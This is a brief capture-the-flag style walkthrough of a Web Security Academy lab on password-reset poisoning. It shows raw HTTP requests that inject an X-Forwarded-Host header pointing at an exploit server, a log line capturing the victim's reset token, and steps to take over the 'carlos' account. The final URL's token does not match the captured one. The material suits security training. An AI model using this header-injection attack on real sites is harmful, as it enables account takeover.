In reset function : 
POST /forgot-password HTTP/2
Host: 0a14004d030cb46080e78f4f009000d0.web-security-academy.net
Cookie: session=ybq9NDT4jIWp2ieYzdT5so9dsEr5yBWn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: https://0a14004d030cb46080e78f4f009000d0.web-security-academy.net
Referer: https://0a14004d030cb46080e78f4f009000d0.web-security-academy.net/forgot-password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

username=calros

use X-Forwarded-Host:
POST /forgot-password HTTP/2
Host: 0a9f000f033391f88040440000d90079.web-security-academy.net
Cookie: session=vwthmSVMmMiXq3HmZ01PgAltsPQoP6J7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: https://0a9f000f033391f88040440000d90079.web-security-academy.net
Referer: https://0a9f000f033391f88040440000d90079.web-security-academy.net/forgot-password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
X-Forwarded-Host: exploit-0aeb008a0375913b80d743ee01ea0078.exploit-server.net/

username=carlos

access exploit server log : GET /forgot-password?temp-forgot-password-token=kx6zqwb47aj9u3tyqgtbat67og5ngxzl HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36

We found user carlos token : kx6zqwb47aj9u3tyqgtbat67og5ngxzl

change token in the URL : https://0a9f000f033391f88040440000d90079.web-security-academy.net/forgot-password?temp-forgot-password-token=rappx7bcibi2wok9f9bvdxhz9n2dfauw

change the password of carlos then login with the new password